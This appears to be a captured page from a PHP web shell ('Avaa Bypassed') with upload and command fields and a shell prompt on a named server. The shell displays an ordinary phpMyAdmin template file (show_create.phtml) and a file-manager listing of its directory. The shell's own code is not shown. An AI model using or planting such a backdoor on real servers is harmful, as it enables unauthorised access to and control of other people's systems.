404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.131.37.237: ~ $
<div class="show_create_results">
    <h2><?= __('Showing create queries'); ?></h2>
    <?php
        $views = array();
        $tables = array();
        foreach ($db_objects as $object) {
            if ($GLOBALS['dbi']->getTable($db, $object)->isView()) {
                $views [] = $object;
            } else {
                $tables [] = $object;
            }
        }
    ?>
    <?php if (! empty($tables)): ?>
        <?= PMA\libraries\Template::get('database/structure/show_create_row')->render(
            array(
              'db' => $db,
              'title' => __('Tables'),
              'raw_title' => 'Table',
              'db_objects' => $tables
            )
        ) ?>
    <?php endif; ?>

    <?php if (! empty($views)): ?>
        <?= PMA\libraries\Template::get('database/structure/show_create_row')->render(
            array(
                'db' => $db,
                'title' => __('Views'),
                'raw_title' => 'View',
                'db_objects' => $views
            )
        ) ?>
    <?php endif; ?>
</div>

Filemanager

Name Type Size Permission Actions
body_for_table_summary.phtml File 3.3 KB 0644
browse_table.phtml File 74 B 0644
browse_table_label.phtml File 100 B 0644
check_all_tables.phtml File 2.8 KB 0644
empty_table.phtml File 177 B 0644
favorite_anchor.phtml File 673 B 0644
print_view_data_dictionary_link.phtml File 314 B 0644
search_table.phtml File 71 B 0644
show_create.phtml File 1.03 KB 0644
show_create_row.phtml File 745 B 0644
sortable_header.phtml File 2.46 KB 0644
structure_table_row.phtml File 6.94 KB 0644
table_header.phtml File 5.51 KB 0644
tracking_icon.phtml File 367 B 0644